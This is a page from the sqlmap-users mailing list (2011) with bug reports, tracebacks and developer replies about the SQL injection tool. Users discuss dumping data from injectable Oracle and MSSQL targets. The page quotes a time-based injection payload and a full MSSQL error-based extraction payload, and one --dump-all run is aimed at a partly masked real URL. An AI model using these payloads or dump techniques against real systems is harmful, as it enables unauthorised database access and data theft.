sqlmap-users Mailing List for sqlmap (Page 94)
From: Miroslav S. <mir...@gm...> - 2011-05-25 10:23:22
hi Chris.

Oracle has a rather different "concept" for databases (from dumping point of view). data is stored into "schemas" which are the same thing as "users", and each user has its tables under the same named schema.

that means that your best bet would be to use the:

--tables -D IFSSYS    <--- current user name

and then dump tables from there on

also, be sure that you are using the latest revision from our repository

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Chris O. <chr...@gm...> - 2011-05-25 10:16:36
Hi All

Not a sqlmap question as such, but maybe someone can help. I've found an sqli flaw in a test that has resulted in the following:

---
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi'
current user is DBA: 'False'
current user: 'IFSSYS'

available databases [4]:
[*] CTXSYS
[*] IFSSYS
[*] SYS
[*] SYSTEM
---

These all seem to be system databases. I don't know enough about Oracle to know if 1) they are all sys dbs 2) if there's anywhere I can go from here. The content of these databases seems to be all related to privs and such within Oracle. What I'm looking for is the web app data. Does anyone more familiar with Oracle know why it would only be systems databases accessible through the sqli flaw?

We can try other tactics later but I was just wondering if this is normal from a data extraction point of view with Oracle. I've dumped a fair amount of the data and there's none systems related so far...

Cheers

Chris
From: Miroslav S. <mir...@gm...> - 2011-05-23 23:17:44
hi David, again.

could you please retry with the latest revision and report back. we've done some changes which could improve the behaviour.

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-23 20:15:26
hi David.

basically, you are right.

default behavior should be to follow up the redirection.

the real problem is that it wasn't a default thingy in "sqlmap got a 302 redirect to" and we all know that people just like to press Enter when running sqlmap and we like to make "dummy click-click yeaa" users :)

will do some changes

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-23 19:59:48
hi David.

that suffix thingy should be fixed with the latest commit. please retry and report back.

about that 302. well, generally it works, but still, maybe it needs little glancing up. it would be great if you could provide with some more information (privately).

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-05-23 16:23:50
hi David.

we'll deal with both issues shortly (today or tomorrow) and keep you posted.

kr

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: David T. <dav...@gm...> - 2011-05-23 15:17:31
Hi all,

I am new to the list, so can I first say a massive thank you to everybody that has contributed to the development of this tool; it is awesome.

I have come across a couple of issues with the current version of the tool.

First, trailing whitespace seems to be stripped from the end of --suffix parameters. I have a blind injection point that requires " -- " as a terminator. If I give the tool --suffix " -- ", this gets turned into "%20--" in the injection, which doesn't work since the trailing space is missing. I've worked around this by appending some extra non-space characters (--suffix " -- xx"), which works, but shouldn't be necessary.

And second, I don't quite understand how the redirect handling works. The same blind injection point I mention above is on a login page. If I don't try to inject, or if the injection equates to false, I get a HTTP 200 return code, with a "login failed" message. If the injection equates to true, the application 302's me to another page.

I get the message "sqlmap got a 302 redirect to...", asking me if I want to re-target. In this instance, I don't want to choose a new target. I know the bsql vuln exists; I just want to use sqlmap to leverage it. However if I hit enter to select the default (keep same target), sqlmap doesn't detect the injection point.

I have also tried providing a --string parameter, but this doesn't affect the result.

Could we please have some way to blindly follow redirects, and compare the eventual result page to that retrieved for other injections?

Thanks again,
Dave
From: Miroslav S. <mir...@gm...> - 2011-05-21 17:08:26
Hi Graziano.

"I use the last svn version of sqlmap, downloaded in day 21/5/2011." :))))))

Which SVN server do you use? Current stable version is 0.9 and development one is 1.0-dev, while you are using "0.6" :))))

Maybe you've downloaded correctly the sqlmap from our repository but you are using some other version. You've typed "sqlmap" which most probably calls some other installed version, while if you try "python sqlmap.py" inside that directory you'll be able to use the correct one.

kr

p.s. to check out the latest revision from our repository please use:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Graziano F. <scr...@gm...> - 2011-05-21 16:00:18
radoen@vaio:~/sqlmap/NUOVO/sqlmap-dev$ sqlmap --proxy=http://127.0.0.1:8118 --dump-all -u "http://xxxx.xxxx-xxxx.it/login.aspx?ReturnUrl=%2fDefault.aspx%3fcs%3d888%26al%3d0&cs=888&al=0"

sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 17:48:56

[17:48:56] [INFO] testing connection to the target url
[17:49:26] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:49:40] [INFO] testing if the url is stable, wait a few seconds
[17:49:51] [INFO] url is stable
[17:49:51] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:49:55] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:49:55] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic
[17:49:59] [WARNING] Cookie parameter 'ASP.NET_SessionId' is not dynamic
[17:49:59] [INFO] testing if GET parameter 'cs' is dynamic
[17:50:05] [INFO] confirming that GET parameter 'cs' is dynamic
[17:50:15] [INFO] GET parameter 'cs' is dynamic
[17:50:15] [INFO] testing sql injection on GET parameter 'cs' with 0 parenthesis
[17:50:15] [INFO] testing unescaped numeric injection on GET parameter 'cs'
[17:50:49] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[17:51:20] [INFO] confirming unescaped numeric injection on GET parameter 'cs'
[17:51:25] [INFO] GET parameter 'cs' is unescaped numeric injectable with 0 parenthesis
[17:51:25] [INFO] testing if GET parameter 'al' is dynamic
[17:51:29] [WARNING] GET parameter 'al' is not dynamic
[17:51:29] [INFO] testing for parenthesis on injectable parameter
[17:51:44] [INFO] the injectable parameter requires 0 parenthesis
[17:51:44] [INFO] testing MySQL
[17:51:53] [WARNING] the back-end DMBS is not MySQL
[17:51:53] [INFO] testing Oracle
[17:52:06] [WARNING] the back-end DMBS is not Oracle
[17:52:06] [INFO] testing PostgreSQL
[17:52:11] [WARNING] the back-end DMBS is not PostgreSQL
[17:52:11] [INFO] testing Microsoft SQL Server
[17:52:16] [INFO] confirming Microsoft SQL Server
[17:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

[17:52:29] [INFO] fetching tables
[17:52:29] [INFO] fetching database names
[17:52:29] [INFO] fetching number of databases
[17:52:29] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
[17:52:29] [INFO] retrieved: [17:52:29] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible:

sqlmap version: 0.6.4
Python version: 2.7.1+
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 81, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 120, in action
    conf.dbmsHandler.dumpAll()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 1043, in dumpAll
    self.cachedTables = self.getTables()
  File "/usr/share/sqlmap/plugins/dbms/mssqlserver.py", line 233, in getTables
    dbs = self.getDbs()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 623, in getDbs
    count = inject.getValue(query, inband=False, expected="int")
  File "/usr/share/sqlmap/lib/request/inject.py", line 364, in getValue
    value = __goInferenceProxy(expression, fromUser, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 297, in __goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 100, in __goInferenceFields
    output = __goInference(payload, expressionReplaced)
  File "/usr/share/sqlmap/lib/request/inject.py", line 60, in __goInference
    count, value = bisection(payload, expression, length=length)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 231, in bisection
    val = getChar(index)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line 101, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, limit)
TypeError: not enough arguments for format string

[*] shutting down at: 17:52:29

I use the last svn version of sqlmap, downloaded in day 21/5/2011.

Good work
Radoen
From: Miroslav S. <mir...@gm...> - 2011-05-15 21:46:40
hi.

"Also, a lot of arabic data is coming down as ?????? instead of the Unicode data"

-this can be a problem caused by either:

A) wrong (non-standard) charset used by the web page
B) different charsets for the page (e.g. some arabic) and the database connector (e.g. latin1) (most often this is the main cause)
C) inability of the console used to display proper characters
D) something else, maybe related to that last commit

kr

On Sun, May 15, 2011 at 10:55 PM, Devon Mitchell <dev...@ya...> wrote:
> Here's another example. Also, a lot of arabic data is coming down as ??????
> instead of the Unicode data. Some works, some doesn't. At any rate, here
> is the debug data:
> sqlmap version: 1.0-dev (r3893)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -u ********************************** -D ********* -T **** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
>     action()
>   File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
>     output = __oneShotUnionUse(limitedExpr, unpack)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
>     page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
>   File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
>     page = getUnicode(page, kb.pageEncoding)
>   File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
>     return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
> TypeError: don't know how to handle UnicodeDecodeError in error callback

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
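
The traceback quoted above ends in a decode call that passes `errors="xmlcharrefreplace"`; Python defines that handler only for encoding errors, so any undecodable byte turns into the `TypeError` shown. The following is an added example in Python 3, not sqlmap's code and not the change the developers committed: it reproduces that failure and illustrates charset causes A and B from the reply on constructed byte strings. The helper names and the fallback policy in `decode_page` are assumptions made for the illustration.

```python
import codecs

# Constructed sample: Arabic text as a page served in windows-1256 would carry it.
ARABIC = "مرحبا"
RAW_CP1256 = ARABIC.encode("cp1256")


def decode_with_encode_only_handler(raw):
    """Decode with an encode-only error handler, as in the traceback.

    Returns the TypeError message, or None when the bytes are valid UTF-8
    (the handler is only invoked once an undecodable byte is met, which is
    why the crash shows up on some pages and not on others).
    """
    try:
        raw.decode("utf-8", errors="xmlcharrefreplace")
    except TypeError as exc:
        return str(exc)
    return None


def decode_page(raw, declared=None, fallback="utf-8"):
    """Decode response bytes and return (text, lossy).

    Hypothetical helper. The declared charset is tried first if Python knows
    it (cause A: a non-standard label is skipped instead of crashing), then
    the fallback, both strictly. Only if both fail is a lossy decode done
    with "replace", a handler that is valid for decoding.
    """
    candidates = []
    for label in (declared, fallback):
        if not label:
            continue
        try:
            name = codecs.lookup(label).name
        except LookupError:
            continue  # unknown or non-standard charset label
        if name not in candidates:
            candidates.append(name)
    for name in candidates:
        try:
            return raw.decode(name), False
        except UnicodeDecodeError:
            continue
    return raw.decode(fallback, errors="replace"), True


def through_connector(text, connector_charset="latin-1"):
    """Cause B: text forced through a connector charset that cannot hold it.

    Each unrepresentable character becomes '?', which matches the '??????'
    output described in the thread.
    """
    return text.encode(connector_charset, errors="replace").decode(connector_charset)


if __name__ == "__main__":
    print("handler error :", decode_with_encode_only_handler(RAW_CP1256))
    print("right charset :", decode_page(RAW_CP1256, "windows-1256"))
    print("wrong charset :", decode_page(RAW_CP1256, "latin-1"))
    print("no charset    :", decode_page(RAW_CP1256))
    print("via connector :", through_connector(ARABIC))
```

A wrong but valid charset label (the `latin-1` case) decodes without error and without the lossy flag, so mojibake of that kind has to be caught by comparing against the page's real encoding, not by exception handling.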
From: Miroslav S. <mir...@gm...> - 2011-05-15 21:41:32
|
hi Devon.

could you please try to update to the latest revision and report back? i believe i've found the faulty part.

kr

On Sun, May 15, 2011 at 10:53 PM, Devon Mitchell <dev...@ya...> wrote:
> I've been having a lot of these recently:
> sqlmap version: 1.0-dev (r3893)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -u ************************** -D ************ -T *** --dump
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
>     action()
>   File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
>     conf.dbmsHandler.dumpTable()
>   File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
>     output = __oneShotUnionUse(limitedExpr, unpack)
>   File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
>     page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
>   File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
>     page = getUnicode(page, kb.pageEncoding)
>   File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
>     return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
> TypeError: don't know how to handle UnicodeDecodeError in error callback

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: Devon M. <dev...@ya...> - 2011-05-15 20:55:20
|
Here's another example. Also, a lot of arabic data is coming down as ?????? instead of the Unicode data. Some works, some doesn't. At any rate, here is the debug data:

sqlmap version: 1.0-dev (r3893)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -u ********************************** -D ********* -T **** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
    action()
  File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
    output = __oneShotUnionUse(limitedExpr, unpack)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
    page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
  File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
    page = getUnicode(page, kb.pageEncoding)
  File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
    return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
TypeError: don't know how to handle UnicodeDecodeError in error callback
|
From: Devon M. <dev...@ya...> - 2011-05-15 20:53:53
|
I've been having a lot of these recently:

sqlmap version: 1.0-dev (r3893)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -u ************************** -D ************ -T *** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
    action()
  File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
    output = __oneShotUnionUse(limitedExpr, unpack)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
    page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
  File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
    page = getUnicode(page, kb.pageEncoding)
  File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
    return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
TypeError: don't know how to handle UnicodeDecodeError in error callback
|
From: Miroslav S. <mir...@gm...> - 2011-05-14 19:57:13
|
hi itxx.

thank you for your report and find it fixed in the latest commit.

kr

2011/5/14 星星 <it...@qq...>:
> sqlmap version: 1.0-dev (r3891)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -l /root/google
> Technique: None
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 283, in start
>     if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
>   File "/pentest/web/scanners/sqlmap/lib/controller/checks.py", line 861, in checkConnection
>     page, _ = Request.queryPage(content=True, noteResponseTime=False)
>   File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 575, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 195, in getPage
>     headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
>   File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 140, in unicodeencode
>     retVal = value.encode(UNICODE_ENCODING, errors="replace")
> TypeError: encode() takes no keyword arguments
>
> [*] shutting down at: 22:59:55

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: 星星 <it...@qq...> - 2011-05-14 15:06:29
|
sqlmap version: 1.0-dev (r3891)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -l /root/google
Technique: None
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 283, in start
    if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
  File "/pentest/web/scanners/sqlmap/lib/controller/checks.py", line 861, in checkConnection
    page, _ = Request.queryPage(content=True, noteResponseTime=False)
  File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 195, in getPage
    headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
  File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 140, in unicodeencode
    retVal = value.encode(UNICODE_ENCODING, errors="replace")
TypeError: encode() takes no keyword arguments

[*] shutting down at: 22:59:55
|
From: Miroslav S. <mir...@gm...> - 2011-05-12 23:35:39
|
hi Francisco.

you are using pretty outdated version (0.6.4). please either:

A) update to the latest version (1.0/dev) from our repository:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

or

B) download latest stable version (0.9) from sourceforge:
http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz

kr

On Thu, May 12, 2011 at 9:40 PM, Francisco Correa S. <pan...@gm...> wrote:
> [*] starting at: 15:38:48
>
> [15:38:48] [INFO] updating sqlmap
> [15:38:49] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developers will fix it as soon as
> possible:
> sqlmap version: 0.6.4
> Python version: 2.6.6
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 78, in main
>     init(cmdLineOptions)
>   File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
>     update()
>   File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
>     __updateSqlmap()
>   File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
>     logger.errMsg(errMsg)
> AttributeError: Logger instance has no attribute 'errMsg'
>
> [*] shutting down at: 15:38:49
>
>
> --
> Francisco Correa

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: Francisco C. S. <pan...@gm...> - 2011-05-12 19:40:16
|
[*] starting at: 15:38:48

[15:38:48] [INFO] updating sqlmap
[15:38:49] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible:
sqlmap version: 0.6.4
Python version: 2.6.6
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 78, in main
    init(cmdLineOptions)
  File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
    update()
  File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
    __updateSqlmap()
  File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
    logger.errMsg(errMsg)
AttributeError: Logger instance has no attribute 'errMsg'

[*] shutting down at: 15:38:49

--
Francisco Correa
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-10 15:47:38
|
Hi,

A couple of days ago we have fixed a minor bug in --dump-all (thanks for the bug report!) and took the chance to improve --dump too.

Now --dump can be used to:

* Dump the entries of all tables within the current database by not providing the database name with -D. For instance: --dump
* Dump the entries of specific table(s) in the current database by not providing the database name with -D. For instance: --dump -T table1,table2
* Dump the entries of all tables in a provided database name. For instance: --dump -D testdb
* Dump the entries of specific table(s) in a provided database name. For instance: --dump -T table1,table2 -D testdb

Note that -C is always supported. If provided, it will dump only those table(s) columns' entries.
As usual, --exclude-sysdbs, --start, --stop, --first and --last are all still supported.

Cheers,
Bernardo

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-09 09:19:55
|
Hi James,

On 8 May 2011 21:33, <ja...@ev...> wrote:
> Hi,
>
> I was recently messing around with another scanner and I found an
> injection I'd like to play around with in Sqlmap.
>
> The injection found is a POST to something.asp and its "
> action=login&login=whatever'=sleep(15)='&password= ". I verified it
> manually and its good to go, however I've not yet been able to get
> SQLmap to detect and exploit it.

I don't get the payload. Is it literally: whatever'=sleep(15=' ? If so, those two equal signs do not look to me like valid SQL. Can you check with the other scanner what exact payload got injected?

What is the back-end DBMS?

Thank you.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: <ja...@ev...> - 2011-05-08 20:36:40
|
Hi,

I think i already tried that but I'll give it another go and report back

-j

On Sun, 8 May 2011 23:35:18 +0300, Ahmed Shawky <ah...@is...> wrote:
> try --level 3 --risk 3
>
> On Sun, May 8, 2011 at 11:33 PM, wrote:
> Hi,
>
> I was recently messing around with another scanner and I found an
> injection I'd like to play around with in Sqlmap.
>
> The injection found is a POST to something.asp and its "
> action=login&login=whatever'=sleep(15)='&password= ". I verified it
> manually and its good to go, however I've not yet been able to get
> SQLmap to detect and exploit it.
>
> I've been messing with --prefix and --suffix but I cant get any
> joy.
>
> Any ideas on this boys?
>
> Thanks in advance,
> James
|
From: Ahmed S. <ah...@is...> - 2011-05-08 20:35:25
|
try --level 3 --risk 3

On Sun, May 8, 2011 at 11:33 PM, <ja...@ev...> wrote:
> Hi,
>
> I was recently messing around with another scanner and I found an
> injection I'd like to play around with in Sqlmap.
>
> The injection found is a POST to something.asp and its "
> action=login&login=whatever'=sleep(15)='&password= ". I verified it
> manually and its good to go, however I've not yet been able to get
> SQLmap to detect and exploit it.
>
> I've been messing with --prefix and --suffix but I cant get any joy.
>
> Any ideas on this boys?
>
> Thanks in advance,
> James

--
- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member "http://www.isecur1ty.org"
- Twitter @lnxg33k
|
From: <ja...@ev...> - 2011-05-08 20:33:14
|
Hi,

I was recently messing around with another scanner and I found an injection I'd like to play around with in Sqlmap.

The injection found is a POST to something.asp and its " action=login&login=whatever'=sleep(15)='&password= ". I verified it manually and its good to go, however I've not yet been able to get SQLmap to detect and exploit it.

I've been messing with --prefix and --suffix but I cant get any joy.

Any ideas on this boys?

Thanks in advance,
James
|
From: Miroslav S. <mir...@gm...> - 2011-05-08 10:48:06
|
hi execute.

this was retested at least 100 times.

snippet (against MSSQL 2005):

[12:45:38] [PAYLOAD] 1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(121)+CHAR(58)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(sysusers.name+CHAR(46)+sysobjects.name AS NVARCHAR(4000)),CHAR(32))),1,100) FROM testdb..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) AND sysusers.name+CHAR(46)+sysobjects.name NOT IN (SELECT TOP 2 ISNULL(sysusers.name+CHAR(46)+sysobjects.name,CHAR(32)) FROM testdb..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY 1) ORDER BY 1)+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)+CHAR(58))) AND 'vVWe'='vVWe
[12:45:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:45:38] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value ':ipy:dbo.users:jnt:' to data type int. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'

i am not sure what's wrong with your case. you can contact me privately and send me some more info.

kr

On Sat, May 7, 2011 at 7:46 PM, execute <ex...@gm...> wrote:
> Hey,
> I'm using the error-based technique for extracting data from an MSSQL server
> (2005 - 9.00.4053.00). It seems like concating the sub-query with a string
> doesn't work well - for some reason, the webserver returns the regular
> response for row not found instead of throwing an error.
> I tested it manually and found the following:
>
